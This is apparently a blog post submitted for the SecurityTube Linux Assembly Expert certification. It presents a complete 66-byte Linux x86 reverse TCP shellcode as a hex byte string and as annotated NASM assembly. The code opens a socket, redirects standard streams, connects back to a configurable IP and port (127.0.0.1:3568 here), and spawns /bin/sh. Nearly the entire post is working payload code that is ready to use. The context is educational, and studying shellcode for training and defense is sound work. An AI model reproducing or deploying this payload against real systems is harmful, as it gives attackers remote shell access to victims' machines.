Now to create a reasonably well optimized linux Reverse TCP shellcode (66 bytes):

“\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68”
“\x7f\x00\x00\x01” <- IP address 127.0.0.1
“\x66\x68”
“\x0d\xf0” <- Port 3568
“\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0”
“\x66\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x31\xc9\x89\xe3”
“\xb0\x0b\xcd\x80”

; Title Linux Reverse Shell TCP Shellcode v0.1
; Author npn
; License http://creativecommons.org/licenses/by-sa/3.0/
; Legitimate use and research only
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

global _start

section .text

_start:
;socket
xor ebx, ebx	;zero ebx
mul ebx		;zero eax
push edx	;0
inc ebx		;socket()
push ebx	;1
push byte 0x2	;2
mov ecx, esp	;move argument ptr to ecx
mov al, 0x66	;syscall socketcall
int 0x80	;socket()

;dup2
xchg ebx, eax 	;eax = 2, ebx = fd
pop ecx 	;2

;connect stack prepare
push 0x0100007f		;only nulls in 127.0.0.1. This can be changed to any IP
push word 0xf00d	;3568
push word cx		;af_inet

dup2:
	mov al, 0x3f	;dup2
	int 0x80
	dec ecx
	jns dup2

;connect continue stack prepare
mov ecx, esp		;move arg ptr to ecx
push byte 0x10
push ecx		;ptr to arg ptr (ecx)
push ebx		;fd
mov ecx, esp
mov al, 0x66
int 0x80

;execve
push edx	;0
push 0x68732f6e	;"n/sh"
push 0x69622f2f	;"//bi"
xor ecx, ecx
mov ebx, esp	;move argument ptr to ebx
mov al, 0xb	;execve()
int 0x80

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-158